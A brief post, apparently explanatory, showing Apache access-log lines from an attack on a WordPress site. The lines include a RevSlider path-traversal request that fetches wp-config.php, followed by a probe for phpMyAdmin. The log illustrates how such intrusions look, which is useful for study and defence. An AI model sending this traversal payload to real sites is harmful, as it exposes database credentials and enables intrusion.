Here's how hackers hack

apachelogfile

188.159.172.201 - - [29/Nov/2014:10:36:23 -0800] "GET /wp-content/plugins/revslider/inc_php/framework/ HTTP/1.1" 200 4572 "http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=294&cad=rja&uact=8&ved=0CC0QFjADOKIC&url=http%3A%2F%2Fwww.pgc3.org%2Fwp-content%2Fplugins%2Frevslider%2Finc_php%2Fframework%2F&ei=HRJ6VLXWH_SS7AaxnICgBA&usg=AFQjCNFDcpsOLNhF5DHkYd9KiHRzN0dLhA&bvm=bv.80642063,d.bGQ" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
188.159.172.201 - - [29/Nov/2014:10:36:23 -0800] "GET /favicon.ico HTTP/1.1" 200 268 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
188.159.172.201 - - [29/Nov/2014:10:37:13 -0800] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 4160 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
188.159.172.201 - - [29/Nov/2014:10:40:29 -0800] "GET /dh_phpmyadmin/mysql.thevictim.com/ HTTP/1.1" 301 567 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"